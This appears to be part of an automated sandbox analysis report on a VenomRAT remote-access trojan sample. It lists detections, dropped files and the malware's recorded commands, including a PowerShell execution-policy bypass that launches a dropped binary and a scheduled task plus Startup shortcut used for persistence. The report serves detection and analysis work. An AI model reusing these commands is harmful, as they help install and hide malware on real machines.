                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Suspicious powershell command line found
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                  Source: curcuma.exe.30.drStatic PE information: real checksum: 0x27934f should be: 0x28b32f
                  Source: ADFoyxP.exeStatic PE information: real checksum: 0x381fe3 should be: 0x3875ef
                  Source: curcuma.exe.30.drStatic PE information: section name: .xdata
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003B0315 push cs; retn 003Ah27_2_003B0318
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00380DE6 push ecx; ret 27_2_00380DF9
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeCode function: 30_2_06E23680 push es; ret 30_2_06E23730
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C7095733 push rdi; iretd 36_2_00007FF7C7095739
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeCode function: 36_2_00007FF7C7096B28 push rbx; iretq 36_2_00007FF7C7096B42

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with a suspicious file extension
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\353090\Seat.comJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\353090\Seat.comJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\curcuma.exeJump to dropped file

                  Boot Survival

                  barindex
                  Yara detected VenomRAT
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.urlJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.urlJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003F26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,27_2_003F26DD
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0037FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,27_2_0037FC7C
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Yara detected VenomRAT
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
